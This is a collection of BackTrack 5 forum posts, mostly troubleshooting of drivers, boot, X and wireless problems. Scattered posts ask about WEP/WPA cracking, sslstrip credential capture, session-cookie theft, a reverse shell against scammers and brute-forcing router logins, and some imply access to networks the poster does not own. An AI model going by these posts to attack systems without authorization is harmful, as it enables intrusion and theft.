/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c: In function ‘_wl_set_multicast_list’:
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1435: error: ‘struct net_device’ has no member named ‘mc_list’
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1435: error: ‘struct net_device’ has no member named ‘mc_count’
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1436: error: dereferencing pointer to incomplete type
/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.c:1442: error: dereferencing pointer to incomplete type
make[1]: *** [/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/src/wl/sys/wl_linux.o] Error 1
make: *** [_module_/var/lib/dkms/bcmwl/5.60.48.36+bdcom/build] Error 2
make: Leaving directory `/usr/src/linux-source-2.6.38'
It seems that the "new" version coming in the upgrade is the same as the old one already installed: "5.60.48.36" and it says that it removed the one installed, but failed to install new one, but wireless is working (not well, but connects, eventually)...

Also, my Ubuntu installation was i386 and BT5 is i686 which is for Pentium?

Can anybody shed some light on this issue?

Thank you.

P.S. Another thing is that all networks discovered show 100% strength which obviously isn't correct either.

I have found many threads about this problem with many different solutions, none of which worked for me.
I could not install VB without errors. I won't list every thing I tried, just check out the forums and I tried em all. The following is my log out-put. The last entry was after I ran the commands listed below.
I am running BT5 32 bit.
Code:
#uname -a
#Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
I have never had this issue until now with VB. I dloaded from the repos and the VBox site..nothing worked until I used this link on the VBox site: http://www.virtualbox.org/wiki/Linux_Downloads then go to the very last link "All distributions". It is a .run file

After dloading:

#cd file.location
#chmod +x file.name.run

chmod even if you are root.

#sh file.name.run
or
#./file.name.run

I used:
#./file.name.run

That's it. No missing kernel modules errors, no dependency errors, no errors at all. VBox is working as I write this.

I've seen several people raising this issue, but so far none of the suggested solutions have resolved it for me, so I'm opening this thread in the hope of getting this resolved. Any help would be much appreciated.

Sqlmap on BT5 produced an error so I removed it, deleted the sqlmap folder and reinstalled it. Whenever I run an update, via either svn up or the excellent script by sickness (0.6) it starts to update then provides the following error:

If I then try and run sqlmap.py I get the following error, that I can only clear if I remove and reinstall (and don't attempt to update it):
Traceback (most recent call last):
File "./sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
from plugins.generic.enumeration import Enumeration as GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 34, in <module>
from lib.core.common import singleTimeWarnMessage
ImportError: cannot import name singleTimeWarnMessage

Again, any help would be appreciated and sorry if this is 'yet another thread' but I can't find a solution so far.

This is the AMD x64 KDE version, I have checked the md5 hash and they are the same.
While attempting to boot the liveCD in plain text or safemode I always get this line of text repetedly "/init: line 3: can't open /dev/sdb: no medium found"
in cycles t /dev/sdb, /dev/sdc, /dev/sdd, /dev/sde.
After about 30 seconds I get this message:
"BusyBox v1.13.3 (Ubuntu 1:1.13.3-1ubuntu11) built-in shell (ash)
Enter 'help' for a list of built-in commands.

I am running windows 7 64-bit so that's not the issue.
Both .iso files were checked to verify that their md5sums were correct, and sure enough they weren't corrupted.
Here is what is happening:
I am using a 16gb usb to try to get this working (fat32), and have used 4 different tools to try to accomplish this (5 With lili, but that's not what i'm looking for) (they do produce slightly different results):
live-usb-install 2.2.9
universal-usb-installer 1.8.5.7
unetbootin ?
FUSBi 0.3.1

Basically it gives me the option of what mode I want to boot in, then i select (default, text etc.)
After I select something it starts loading normally. Then I get to the splash screen just before the chinese characters (i haven't given it any input yet)
I sit there waiting for 5 minutes, with nothing happening. Every time. the esc button or arrow keys will immediately make it swap to a text based thing where it asks me to name the drive(or something very similar, the example is debian5.0.2 drive (definitely something to do with debian 5.0.2)). I'm pretty sure that that's not what i'm looking for. Do you reckon I should just give it longer to load?
Any comments would be higly appreciated

I usually don't post much but for curiosity sake I was wondering what ways could be used to gather information for the situation below.

Explanation:
I got a call from "Windows Tech Support" which I obviously know is a scam of them getting you to download some "remote control" software which gives them access to your computer and at that time they lock your keyboard mouse and ask for money or they start deleting files. I played with them for a bit socially on the phone to see exactly what they were trying to do and then after phoned the local law enforcement to let them know what is happening. They knew what was happening and said these people use pre-paid phones and are not possible to track.

This got me thinking because since they get you to install remote software onto your machine and they make the secure connection you should be able to netstat to find out their ip (or could they be doing that through tor/etc?). Next I was thinking is it possible to setup a reverse shell on them? When they connect to your machine (dumby virtual pc) with the remote software what could you do?

Now I know I am not skilled enough to perform something like this but I am interested in if its possible.

I have a Acer TravelMate 5542G Notebook and want to install Backtrack 5. When I boot from the BT5-DVD it comes the Text:
"ISOLINUX 3.63 Debian-2008-07-15 Copyright (C) 1994-2004 H. Peter Anvin
boot:"
I press enter and then i choose "BackTrack Text - Default Boot Text Mode"
Then come many text and a Window with Text and the BT-Logo and then the Display is black:(

When i choose "Backtrack Debug - Safe Mode" the Text hold on after a little bit time and the follwing Text is there:"Fixing recursive fault but reboot is needed!" or "panic occurred, switching back to text console"
What informations need you need and what can i give you? And from where i get it?

I am trying to hook up my F5D7050 Belkin network wifi card to BT5. I have read that people have had success on BT4 with installing this Wi-Fi usb network . It seems that most lists exclude Belkin even though it may be possible to install this version of WiFi card. I have tried the usual steps and cannot get it installed. Can anyone help?

Recently i burned Backtrack 32 bit gnome on a live cd and when i insert the cd, restart my laptop and let everything load i just get a black screen a while after the startup mode selection, I even tried the 64 bit version and also didn't worked. I tried the live cd on my sister's laptop and worked perfect without any issue's.

Ok guys, it took me a while to figure this out so I am posting it here to help out any one in the future that runs into this problem.

The setup here is that I wanted to use PGP Whole Disk Encryption on a Win7 (64bit) along with BT5 (64bit) KDE on the same laptop and dual boot. So here are the steps I used to make this work.

1. Install Windows 7 as you normally would.
2. Install BT5 from LiveCD/unetbootin (see BT wiki for build instructions) and use the "run side by side option" but put the grub boot loader on the extended or root partition.
- Basically anywhere other than the Windows boot loader or the MBR
- I put mine on /dev/sdb2, which is the front of the extended partition.

Keep in mind that in order for this to work, when installing Backtrack you should
have installed grub2 on your root (/) partition and not the MBR or the windows partition.
(When you install Backtrack at the very end, before install, click the Advance button and pick your root (/) partition or in my case /dev/sdb2)

Boot into backtrack using livecd or the USB boot drive, just like
you did for installation. DO NOT BOOT FROM THE HARD DISK.

Open a terminal window and type:

fdisk -l

This will list all of your existing partitions. Look for the partition
that you installed Backtrack Loader on. List should look something like this:

Once you find your boot parition use the following command to extract the first 512 bytes to a bin file

dd if=/dev/sdb2 of=grub.bin bs=512 count=1

This creates a grub.bin file in the current directory you ran the command in. (Probably root)

Copy this bin file to a USB or over to the windows partition if you still have access. You will need this file for booting later.

Hint: while your here go ahead and grab all of the first 512 bytes of each sdb so if you need to later you can just copy and paste them to
replace your grub.ini later incase the boot fails or you get a blinking cursor.

This way you dont have to keep booting back into livecd to get them and you can just rename them from grubx.ini to grub.ini after testing to see if your boot works.

Ok after you have your grub.ini files reboot back into Windows 7.

Now we need to edit the bootloader for Windows 7. Granted there are better ways to do this, such as using EasyBCD, but they dont
have the specific abilities (file path designation) to do what we need.

Perform the following in Win7 to map the Win boot partition:

Right Click "Computer" from the start menu and goto "Manage".
Click "Disk Management"
Right Click the "System Reserved" partition (about 100MB) and
click "Change Driver Letter and Paths"
Assign it the default letter if you want and click OK.
Mine was letter E:, but yours may very depending on how many drives
you have connected to your box.

Note: you may have to unhide your files/folders in folder options. I do this by default so I am not sure if it is required.

Now we need to edit the boot loader:

GOTO Start>Programs>Accessories>(Right click) command prompt and
choose run as administator.

From the command line run:

bcdedit -store f:\boot\bcd -create /d "GRUB" /application BOOTSECTOR

You will get a message with a description ID inside {}:

The entry {3a786276-a9b5-11e0-9a8f-5c260a61386f} was successfully created.
Make note of this ID we will need it.

Hint: You can rename "GRUB" to "Linux", "BT" or whatever text you want to see on boot.

Now lets add the grub file to the boot record:
Copy your grub.ini file to the C:\ drive, and perform the following:

As the title states ettercap has disappeared on me, I don't know if i installed a package that stripped it away or whats going on but when I tried to download it from the repos again I get a 404 error

Code:
# apt-get install ettercap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
ettercap-common
The following NEW packages will be installed:
ettercap ettercap-common
0 upgraded, 2 newly installed, 0 to remove and 4 not upgraded.
Need to get 517kB of archives.
After this operation, 1,716kB of additional disk space will be used.
Do you want to continue [Y/n]? y
Err http://32.repository.backtrack-linux.org/ revolution/main ettercap-common 1:0.7.3-1.4ubuntu1
404 Not Found
Err http://32.repository.backtrack-linux.org/ revolution/main ettercap 1:0.7.3-1.4ubuntu1
404 Not Found
Failed to fetch http://32.repository.backtrack-linux.org/pool/main/e/ettercap/ettercap-common_0.7.3-1.4ubuntu1_i386.deb 404 Not Found
Failed to fetch http://32.repository.backtrack-linux.org/pool/main/e/ettercap/ettercap_0.7.3-1.4ubuntu1_i386.deb 404 Not Found
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
I did run apt-get update and then I tried apt-get install ettercap --fix-missing and still got the 404 error.

I noticed this same problem has been occurring with other people in the update-script thread, but I've personally never used that script.

Does this have anything to do with the latest version of ettercap being released?

I don't know weather this is a common problem with Windows 7 but for some reason when I open my dictionary txt. document it hangs in Windows 7, I don't have problems opening them in Xp 32 or 64 but when I try to open my wordlist in 7 no matter what size the txt.file is ( 500MB or 2GB ) it hangs for a long extended period of time? Is there anyway to resolve this problem in Windows 7 Because this does not happen in Xp.

Here is a screen shot of me opening my wordlist

As you can see by my screen shot it says ( not responding ) keep in mind that this is only a 300MB wordlist, it took 24mins for it to open. I tried opening it in notepad as well as notepad 2 an a few other text opening programs an I still get the same out come.

I've also noticed that it takes a tremendous amount of system resources to open 1 txt.file even when I end many open processes that are open on my computer, I would have 50 processes running which is not a lot considering I have 8GB of RAM an still it hangs?

I have not even opened up one of my large GB wordlists because it hangs forever, does anyone have any solutions to opening wordlist txt.docs in Windows 7 without the long hang time?

The problem is when connecting to the router with BT5 using wireless antenna model AWUS036NH It tries to get past t validating authentication in WICD but then gives a 'bad password' error when the password is right and Winows can connect to the wireless fine with the same credentials.

A number of 'fixes' have been tried from going through the forum however none have resolved the issue.

BackTrack VM Version 5

Tried in ISO

BT5 gnome 32 bit VMPlayer

BT5 gnome 32 bit VMWare Workstation

Tried in ISO within Oracle Virtual Box

BackTrack 5 compatible wireless adapter - AWUS036NH

Has anyone experienced this before and can offer any tips/suggestions?

Ok so after downloading Backtrack 5 KDE 32-bit version i installed it to a DVD and ran it as a LiveCD. It worked perfectly, connected using WICD perfectly. Then i installed it to my HD to run a dual boot win7/BT5. After doing this i got the "cannot connect do d-bus" error which i fixed and it connected again perfectly. I installed some drivers for my system (ATI Catalyst Drivers) and a couple other small things that should not effect the system much. Well i had restarted my computer a few times through all of these processes and everything connected so i assumed everything was alright. I shutdown for the night using "Shutdown -P 1" and went to bed. I woke up the next morning and started the system up again and came across the "Bad Password" issue. After spending the rest of last week reading "fixes" to this issue and reinstalling backtracks about 3 times...nothing worked. I removed network-manager, i reconfigured wicd etc. There were about 7 different "fixes" to this issue that i've tried. Finally i came across an article that basically instructed me to force-downgrade WICD to version 1.6.1 instead of 1.7. After doing this i got past the Authentication issues and no longer received the Bad Password error. Now instead i get "Unable to get IP Address" after wicd takes about 5 minutes to get past validation and into obtaining IP address phase. I am about to test and see if GNOME gives me the same problem ( I'm kind of new to Linux so really this is just a guess).

Does anyone have any idea what is causing this issue? The current wireless card that I am using is a D-Link DWA-552, the AP is a D-Link DIR-655 Xtreme-N router.

Quote:
[-] Exploit exception: RCPT: 550-dsl181157.$$$$$$$$$$.net (zbwQXWNO.com) [MY IP ADDRESS ] is currently not
550-permitted to relay through this server. Perhaps you have not logged into
550-the pop/imap server in the last 30 minutes or do not have SMTP
550 Authentication turned on in your email client.[*] Exploit completed, but no session was created.
Any idea? how to fix this

HI i got a problem with loading those rainbow tables(wpa_psk-h1kari_renderman) in gerix cracker i got a folder 33gb with files. can some on can give me full guide how to load those files in gerix cracker

I am using BT5 Gnome 64 with an Alfa AWUS036NH USB adapter and my internet speed is horrible. I am getting around .2 Mbs when running a speed test at speedtest.net. On windows I am able to get at least 6 Mbs. I am connected through WPA. Any help on this is greatly appreciated.

Ok, here's my problem. My goal is to dualboot my windows 7 with backtrack 5 KDE 32/64 using the provided installer. So far, none have been working correctly, so I haven't even begun trying the installer.
Here's what I've tried: BT5 GNOME/KDE 32/64 with UNETBOOTIN, LiveLinux USB creator run both as administrator and with regular permissions. I've tried every iteration of all those. Twice. Yes, I've done this at least sixteen times. It's a little frustrating, especially because on other computers I've used they work fine. The closest I've come was when I used BT5 GNOME x64 w/ LiveLinux USB, and Unetbootin w/ BT5 KDE x86, both eventually got me to the startx desktop, though KDE had a black screen that I typed "startx" into on instinct. Even when I'm on the desktop, no tools work, Most notably Gerix-Wifi cracker, which is the one I need the most. It just doesn't run. Although in GNOME, it shows when I log out as an unknown process. Why is this happening to me?! Someone please help me! I posted all the info I think you need, checked all the solutions I could, but if I left something out please tell me. As of now, it's a USB boot, so all the things are default. Please help. Thanks.

i was searching over internet resolution for my problem with BT5 and did not success in resolving.
So i will try here to find solution from your help :)

Anyway, i just installed BackTrack 5 x64 KDE and after install i did remove cache files and install (from nVidia website) drivers, now when i try to start X i got first screen with KDE loading and after that he crashed and report error.
Here is my xorg.conf: http://pastebin.com/2FZ4Jrt7
and log of X: http://pastebin.com/D7uH9F0y

I think that`s all what you need for troubleshooting if something i miss, please request.

Thanks for looking at this and helping. I'm a beginner to backtrack. I'm having an issue with starting Backtrack 5 from a live usb. I'm using x64 gnome distro. Whenever i try to use startx, i get the message "startx: not found". Ive looked, but i cannot find anyone who had the same problem as me. Is there any way to fix this? I've tried booting into safe mode, text mode, and default mode, but startx does not work with them either either.

hi everybody,
i've some problem with my pc when install BT5 after write "startx" my pc will reboot and the screen is black and a message on the monitor " no card supported"
my graphic card is a Ati Radeon HD 5870 and my pc is a I7 980X.

been looking last 2 days on bt forums and fixs and bugs and and and my head going to expoloed :(
i loved bt4 and was realy looking forward to bt5 but the problem is i can't even start it when first got it, i have download bt5 KDE64 AND KDE32 and GNOM64 AND 32 non of them working for me, when i startX the window kick me back to the startX aigain, i tried the fix http://www.backtrack-linux.org/forum...x-problem.html but is not perment fix, i tried it on VMware and live CD and same problem!
can anyone please help me out to get my bt5 running ? as you can see am new to backtrack and very keen to learn,

Did some Google search , i found a final fix for Ettercap and resolved the crashing/freezing problem.
1) Uninstall the existent version of Ettercap on BT5 using package manager.
2) download these packages:

im really new to this, yesterday i installed vlc from the repos (at least i think it installed properly) cant seem to find how to run it without a command tho but anyway, so i type "vlc" to try and run it and get the following:

coudnt fing how to screenshot as i have BT5 installed on HD not in Vmware
(and i did the hex edit already to allow it to run on root)
Can someone explain how to install something from the repos and how to get vlc to work/properly run it? thanx alot (im new to linux)

We're in the middle of securing our webmail access, this is now just a connection over the internet towards a webserver, that webserver is then requesting username and password, however this is done over a non secure line (just http), we were wondering if it's possible to intercept the username and password while sniffering on that specific port of the webmail server? Everyone is talking about SSL and secure access trough vpn, or others. But as far as I know it's not possible to sniffer on a public webserver (eg webmail.xxx.xx) if your not on the LAN of the host or the server. So pretty secure I guess? I've seen some documents about man in the middle attacks, but again, this is when you're on the LAN of the host or server...

Does anyone has any ideas on how to test the security of that webmail provider?
or some great documents about that?

Now here is my issue i have set my network adapters in bridge mode and tried every thing to bring wifi up on BT5 but no success I have also copied iwlwifi-6000-ucode-9.221.4.1.tgz at /lib/firmware. i have restarted wicd services but there is no wireless device find. Can anyone help me on this issue or experiencing same problem?

I am currently having an issue with the "airmon-ng start wlan1" command. When I input this command, it does not list any interfaced. The weird thing is that when I input the command "airodump-ng wlan1" it works, it list the BSSID's.

This is the process which I used to get my card up and running:
ifconfig wlan01 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airodump-ng wlan1

I did have to kill a few PID that were listed when I input the command " airmon-ng start wlan1"

So my main question is why is my interface not being listed when I input commands "airmon-ng" or airmon-ng start wlan1".

Greets peeps,
Roughly 7 or 8 months ago a rather interesting discussion appeared on the ol' Backtrack 4 forums on brute forcing. You can view that topic here, http://bit.ly/nB2diq. The author, CKing, is mostly (to my understanding) just conceptualizing a free-to-use online WPA brute forcer for Backtrack Forum members. Well, he mentions that cost would still be an issue, but that he'd fork up some preliminary hardware. This got me thinking... why not build a WPA Brute Forcing (or even brute forcing in general) distributed computing project. I think it'd be best not to focus on WPA only (especially since there's already a fatal flaw in TKIP I've been looking into... those of you wondering why tkiptun-ng doesn't work, I can help), it'd be especially nice if we could make a versatile platform that can run a number of brute force attacks.

It would be much like the folding@home (http://bit.ly/9yJHvq for more) or other @home distributed projects. Distributed computing harnesses millions of volunteer computers as a parallel supercomputer. This means we'd need a willing audience. To help with this I'm thinking the client used to perform an attack would require that you've already donated somethign like 24 hours of GPU/CPU time. Lots of people with small servers could easily add a VM to handle additional volunteerin which would be nice. Someone may have to run a centralized server, which I'd be willing to sink a little "one-time-only" money into.

As far as the programming goes, I'm not too familiar with this sort of project, but Berkley offers some tools like BOINC (the Berkeley Open Infrastructure for Network Computing. More here, http://bit.ly/aUbL0P). Clients would be supported on all OSs.

That's about as far as I've gotten, right now I'm really just looking for reactions and maybe a few dedicated people with some basic (or expertise) programming skills to contact me. You can email me directly @ jesusfreak2121@gmail.com

I just got my new BT5 ISO and I tried loading it on the USB Pendrive that I just bought for it (16GB Freecom).
I made two partitions 4GB and 16GB. The 4GB was the first and I formatted it to fat32.
The other 12GB (Still unused, planned to make that a Truecrypt Volume) I loaded the iso on it using unetbootin.
All was successful I booted my laptop, got the unetbootin grub menu. Started booting, saw a framebuffer but then it stopped with an error.
I know the error is required to fix this. But I think that the flaw is there since I just a 16GB Pendrive. In the BIOS my laptop sees it as a Harddrive and NOT as a Removable Disk.
When did the exact same on on 8GB stick it was flawless.

So, can the issue be my 16GB stick or did I do something wrong. If I did something wrong, I'll reboot again try to trigger the error and write it down on a piece of paper.
But I'll leave it for now since its 2AM and should get some sleep.

Ive had ssl strip working pretty well but i used to be able to see usernames and passwords in my sslstrip terminal. but now i can only see them in sslstrip logs. Is there a specific command i need to use to see data on the fly?

I've managed to get my Late 08' Macbook Pro to dual boot BT5 with little or no problems at all. It does indeed support injection with its native wifi card and I've been cracking everything I can get my hands on.

However, I can't seem to have Airodump-ng display the power of scanned access points for some reason. Results shown are only "0" or "-1".

I tried to install Teamviewer6 on my live USB BT5_x64, but when i run
Code:
root@bt:~# teamviewer6
it give:
Code:
TeamViewer must not be executed as root!
and, when i try with:
Code:
root@bt:~#gedit /usr/bin/teamviewer6
oops, no conditional IF there :confused:

so, i will give the complete summery to download and install Teamviewer6_x64 on BT5-GNOME-x64:
Code:
root@bt:~# wget http://www.teamviewer.com/download/teamviewer_linux_x64.deb
root@bt:~# dpkg -i teamviewer_linux_x64.deb
then edit wrapper:
Code:
root@bt:~# gedit /opt/teamviewer/teamviewer/6/bin/wrapper
and search (Ctrl+f) for "TeamViewer must not be executed as root!"

I'm trying to crack WEP key, there is no clients at the moment (hardly used network I suppose...), I've spoofed the MAC address, but can't get injection started, as I can't pick up a single IV.
Although I have a .cap file with 7 IVs, can I use it somehow to start the attack?
Here are screen shots to illustrate my situation.

Also if RXQ is usually very high, but sometimes drops very low. Does it definitely mean that there is a client that is not in my range?

I'm attempting to gain super user access to my router. I own the router but I'm attempting to do this as if I didn't. The default password is the serial number. Ports 80 and 443 are the only two fully open, unfiltered ports. I've attempted to telnet (always disconnected) and I've attempted to TFTP and extract the configuration file. I'd like to save brute forcing the password for last, if possible.

What tools can be aimed at the router to gain access? Is there an attack that I can do to force it to reveal the serial number?

I have researched this into the ground and can't find a solid answer beyond brute forcing the router login.

Hi all good will do the first time I'm using this system and good first thing I did is follow the steps of installing the system and all good now when I log in I get the login screen, login as root and typing the command "startx" and even stays on the screen goes black and the light comes on uppercase and off repeatedly is not happening and that doing so does not enter the system and someone can help me? BT5 use 64bit

Hi does BT5 works with this device? http://www.openpandora.org/ i notice that there is ARM version of BT5 and i was wonder if it work on this small PC with a package injection and other sweet stuff that BT5 have

EAPeak is a Python powered script that is meant to parse useful pieces of information for a Security Assessment of wireless networks that use the Enterprise Authentication Protocol. It relies on the Scapy libraries to parse both PCap files and live network captures. Some highlights of the information that EAPeak can pull from wireless networks include:

EAP Types supported by Access Points

EAP Types supported by Clients

Client Usernames

LEAP MSChap v2 Challenge and Responses

EAPeak relies on the Scapy Community Repository libraries available here: http://hg.secdev.org/scapy-com
The community repository version of Scapy is required because the standard trunk does not contain the layers necessary to parse EAP frames to the extent that is necessary within EAPeak. SecureState has added the layers to the Scapy Community Repository to both parse and inject EAP-TTLS, EAP-TLS, PEAP, LEAP. The functionality of the standard EAP frame to include additional information, such as parsing Legacy NAK information. The additions to Scapy have laid a foundation that will facilitate injection of EAP frames, which will play a key role in additional features.

I have previously posted about issues with BT4 booting when there is a SOURCES folder present on the root of the drive. As it turns out, this is related to a bug in the version of apt-cdrom that is distributed with BT4 and BT5.

I encountered this issue because I was creating a multiboot USB drive with multiple distributions of Linux, along with UBCD4WIN, and an all-in-one Windows 7 installer image. The folder for the Windows 7 installation files can't be changed, it has to be named "SOURCES" and has to be on the root of the USB drive for it to install. Since the Win7 installer can't be changed, the only solution I was able to come up with was remastering the BT5 cd with updated apt* binaries.

Copy the new filesystem.squashfs file to the bt5 casper folder on your flash drive (overwrite the old one)

I imagine this will resolve itself as future versions of Backtrack are released, but for now this solution will work nicely for anyone attempting to cram multiple tools on one USB stick. If anyone is using the 32 bit bt5 KDE version (for broader compatibility), feel free to download the updated apt binaries from here, so you don't have to download kubuntu and extract them yourself.

I've read about a hundred posts on this problem and I've done everything imaginable to fix it. I'm frustrated to say the least. I can run the live cd fine with no problems at all but when I do a hard drive the problem is there. I load up fine and log in as root but when I type startx and hit enter I just get blank screen. The solution I'm useing right now is to boot in recovery mode and then select resume normal boot and it lets me in just fine. I have a dell with intel hd graphics and an i3. If you need more info just let me know. I'm kind of a noob at all this so just bare with me. Any help would be appreciated.

One of the three main issues I am dealing with i Java Plugin for Firefox. I need to pentest a app that is Java using BT progz including Burp Pro, but I have yet to get Java working. Tired of booting Windows VM for everything that doesnt work in Linux.

Based on my searches, this is a common prob. I have tried 7 differents solutions from this forum and others and none work. I have 10.4, 64bit Gnome BT install. I have tried to get Java plugin working on UBU 11.x and other installs, but cant get it going. Has this been tweeked, yes.. but i have tried in generic installs as well.

Is there a solution that works like the flash fix from sickness post??? Thats what I need for Java Plugin. ANyone, Anyone??

What are the other two issues you ask. SD Card Reader and KeyBoard lights.. Shouldnt be this much work to get to work.... It should just work

I have BT 5, on ASUS G73 64Bit Gnome. I have tried all versions of Firefox to no avail.
Just says not installed. Is this Backtrack related, no. But i need BT to test and firefox is a part of that. Also figured with the collective, someone has the answer for me..

i'm testing BlackTrack 5 in virtualbox 4.0.10. i installed it as a virtual disk.
i have a Network adapter : RealTek PCIe GBE family controller.
my host is Windows 7 and my guest in Virtualbox is BT5.
however when i set network adapter to Bridged adapter, i see no wlan0 or eth0 in BT5.

where is the trouble ?

if i use the commview wifi driver atheros AR9285 (which has replaced my default Wifi driver from my laptop) from my host, BT can access to internet.
so why in this cas i'm still not able to see any eth0 or wlan0 as it should be ?
thx.

-Main harddrive (external) with a Truescrypt Volume, a normal Truecrypt volume with some random data, and a hidden volume (which needs the keyFiles to mount) which contains the Backtrack5 virtualbox image.

My Question is: Do you guys think its possible to mount my external harddrive to any pc (which has virtualbox installed) and then load the Backtrack image (After authenticating with Truecrypt) into virtualbox?

My Second Question is: Let's say i got Backtrack loaded in Virtualbox and i spoofed my Mac-Adress, once i will be connecting to lets say a wireless network, will i connect with my spoofed (virtual) mac-adress or with my Host Mac adress?

Yesterday I installed Vmware Workstation 7.1.3 on Backtrack 5 32 bit. But it didn't seem to work because it won't work on the right way, It asks for the path to the kernel drivers.
Now I tried to install VirtualBox 3.1.6 and that worked well.

But now I wanted to install Windows Server 2008 in it, but that won't work.
I got a window with "Kernel driver not installed (rc=-1908), please install the virtualbox-ose-dkms package and execute 'modprobe vboxdrv' as root.

------------------------------
Deleting module version: 3.1.6
completely from the DKMS tree.
------------------------------
Done.
Loading new virtualbox-ose-guest-3.1.6 DKMS files...
First Installation: checking all kernels...
Building only for 2.6.38
Building for architecture i686
Building initial module for 2.6.38

Hi to everyone. I started using BT5 some time ago and I'm facing a problem, that I can't solve myself. I have backtrack installed on and old laptop with integrated video via/s3g unichrome igp. The problem is that in system>preferences>monitor is described as "unknown" and offers only one resolution 1600x1200@0.0 Hz that works, any other resolution results in vertical stripes and desync of picture. However with 1600x1200 I can see only top left corner of my monitor, which is really inconvinient.
My xorf.conf says "Monitor - generic, device - generic", I deleted it following one of the advices on the internet and nothing changed. I tried adding new modes to xrandr, but the all return crtc error.
What should I do? Maybe reinstalling the system would help?
Thank you

When I am explore thinks on the harddrive with dolphin file manager, some times it just crashes and my laptop freeses, al I can do is hold the power button and restart.... What is wrong why is this? I have a syslog:

I am trying to boot from the bt5 Gnome 32bit installer on a Dell Latitude E6400, but I keep getting the same error (seen in picture). I have a 64bit and 32bit disk burned, both boot fine on my T60, so it is not the disk. I have changed all the security settings I could think of in the BIOS that could be blocking the installer, but it still gets stuck at this point. I am already running bt4 r2 dual boot with Win7 just fine, so I am not sure what is going on.

Ive got a notebook with Nvidia GT520M and Optimus Technology..
I have installed BT5 Gnome edition and as known the default resolution is 1024x768 and i cant change it by configuring the file xorg.conf or by adding a new mode with XRANDR.

Furthermore, i cannot install nvidia drivers by nvidia's official site because its Optimus technology and i think it firstly needs intel's VGA drivers.
I tried a lot of packages-drivers i found at repositories with no luck... Is there any drivers for Intel's VGA ??

Or could someone tell me how to configure the xorg.conf file, because i did google a lot and try many things with no luck.
Also i tried a little this tutorials here but i cant even find Nvidia-kernel-dkms at repositories and if i donwload it mannually i get errors...

Please i would really appreciate if someone tries to help me out.
Thanks in advance, a desperate Backtrack fan :P

I was setting up some soft-ap's and comparing the various brands of RTL8187L chipsets.. Alfa AWUS036H, GSky GS-27USB and FreeWiFiLink FL-10000G. I went looking for latest drivers for windows and found Gsky and Alfa ok. Freewifilink seems to be dodgy, and one of the search vectors led back here to this post: http://www.backtrack-linux.org/forum....html#post4833

This adapter seems to perform ok, not as good as the other 2, though the interesting thing is what was on the back!

So, I have a laptop, brand new, running a dualboot with ubuntu and windows 7. Ive downloaded Backtrack 5 both GNOME and KDE in ISO format. I have a USB flash drive, and when I put either one on it and choose to boot from my USB, all my computer says is that is cant find system operative. any help?

Hi guys, i am new to backtrack 5 i have it installed side by side of my windows

I have managed to crack my old wep router and my wpa, but i havnt learn't anything, just followed step by step tutorials and have no understanding what the commands mean or do, i did abit of reading on how to steal live session cookies but its the same step by step guide. i have searched the forums but had no look in finding some sort of "noobs guide to backtrack"

Just need a some sort of reading material to learn from.

How to install programs like wifi zoo or any program
And what all the basic commands do in the terminal

I have never used linux before and i hear backtrack isnt the best version to start off with, but i reckon if i start with the hardest i will learn more.

It's been a while since I used Backtrack. Anyway, I've recently moved to BT5 KDE on my laptop to give it a go. After installing it with my standard full HDD encryption using luks/lvm and adding a new normal user I decided to customize the installation a bit. Now I've been trying to get KDM to autostart at boot. Basically I've followed this HOW-TO, but I just can't get it to work.

"apt-get install kdm" said that kdm is already installed/newest version, and the file "/etc/init/kdm.conf" already has the "exec kdm" line at the bottom.

All I get is the standard console login prompt. I must be missing something.

Using unetbootin build bootable USB drive with BT5. (Instructions can be found on the backtrack wiki)

Using F12 boot options boot off the USB drive into BT5 Live.

On boot you will see the default boot text and then the BT5 logo screen and then the diplay will probably go blank.

Dont worry about the blank display. Wait about 2 minuntes, then just blindly type "startx" and you should see activity on your USB drive. With in a few seconds you should see the BT5 loading screen, it will probaly go black and lock up your mouse pointer. If you didnt see the loading screen after typing "startx" and the mouse lock, then reboot and try again. I had to reboot mine about 5 times till it got there.

Also, keep in mind during this process that the USB port on the left side of your M14x ALWAYS has power when plugged into the AC adapter, even when shutdown. So you may have to remove your USB drive to see it again in the boot list after hitting F12.

Ok, so after the mouse pointer lock with the black background, you will need to blindly type this:

You should now see the BT5 boot screen again and this time it shouldn't lockup and actually let you into Backtrack 5.

If you get a message saying: Do you want KDE to permanently forget about these devices? just check the "Do not ask again" box and click YES.

Run the "Install BackTrack" shortcut on the desktop to being installing BT5. Go through the installation process, accepting most of the defaults as you would for a normal installation. Hint: if your running Windows, just choose the option to run them side by side.

On the "Ready to Install" screen click the "Advanced..." button and choose your hard ddrive from the drop down list. Mine was /dev/sda "ATA STXXXX (750.2GB)

Click OK, then click Install, Restart Now after the installation has finish.
Note: you may have to physically power off if the reboot hangs. (remember to remove your USB drive)

After the reboot you should now see the GRUB2 bootloader with a few options. By default you want the top entry or just let it time out and it will pick it for you.

Once BT5 has booted you should be at the login screen. Use the default root/toor user/pass to login. Then type

You should be able to boot into BT5, but you will notice that the screen resolution is stuck at crappy 1024x768 and you have no options to change it or even use the external video ports (VGA, HDMI, etc).

Sooo.... Lets fix that.

